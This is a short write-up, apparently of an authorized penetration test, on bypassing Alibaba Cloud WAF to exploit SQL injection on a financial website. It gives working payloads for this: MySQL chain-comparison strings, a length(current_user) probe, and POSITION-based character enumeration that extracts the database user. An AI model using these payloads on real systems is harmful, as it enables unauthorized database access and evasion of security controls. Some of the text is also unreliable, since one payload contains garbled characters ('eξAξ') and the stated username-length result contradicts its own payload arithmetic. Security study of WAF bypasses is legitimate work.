Bypassing Alibaba Cloud WAF on a Financial Site via MySQL Chain Comparison

Background

During an authorized penetration test of a financial website protected by Alibaba Cloud WAF, a query endpoint was found to be vulnerable to SQL injection.

Discovery Process

Testing with increasing numbers of single quotes showed error/302 for 1 and 3 quotes, while 2 and 4 quotes returned HTTP 200 with data, confirming an injectable point.

Simple payloads were blocked by the WAF.

Closing the Injection and DB Type Identification

Using MySQL’s chain‑comparison syntax, the payload '=1='1 successfully closed the injection and returned normal data, indicating the backend is MySQL because Oracle and PostgreSQL reject such syntax.

Another payload '=0='1 produced no data, establishing a boolean‑based behavior where the expression evaluates to true (1) or false (0).

Payload Construction and Boolean Logic

The author explains that MySQL treats numeric 1 as TRUE and 0 as FALSE, and that the expression '=1='1 yields true, causing the server to return the full result set, while '=0='1 yields false, returning no rows.

Extracting Current User Length

By injecting '=10-(length(current_user))='1 the response contained data, revealing that length(current_user)=9. A similar payload with 11 returned no data, confirming the length.

Enumerating the Full Username

The POSITION function was used to locate a character within the username. Payload '=POSITION('x'+IN+current_user)='1 returned data, indicating the character “x” appears at position 1. Adding the BINARY keyword forced case‑sensitive matching.

By iterating over the alphabet (e.g., '=POSITION('eξAξ'+IN+current_user)='1) and observing which payload yields a true result, each character of current_user was recovered step by step.

Conclusion

The attack leveraged a rarely used MySQL chain‑comparison feature and boolean‑based payloads to bypass Alibaba Cloud WAF, determine the database type, and extract the current database user name without triggering the WAF.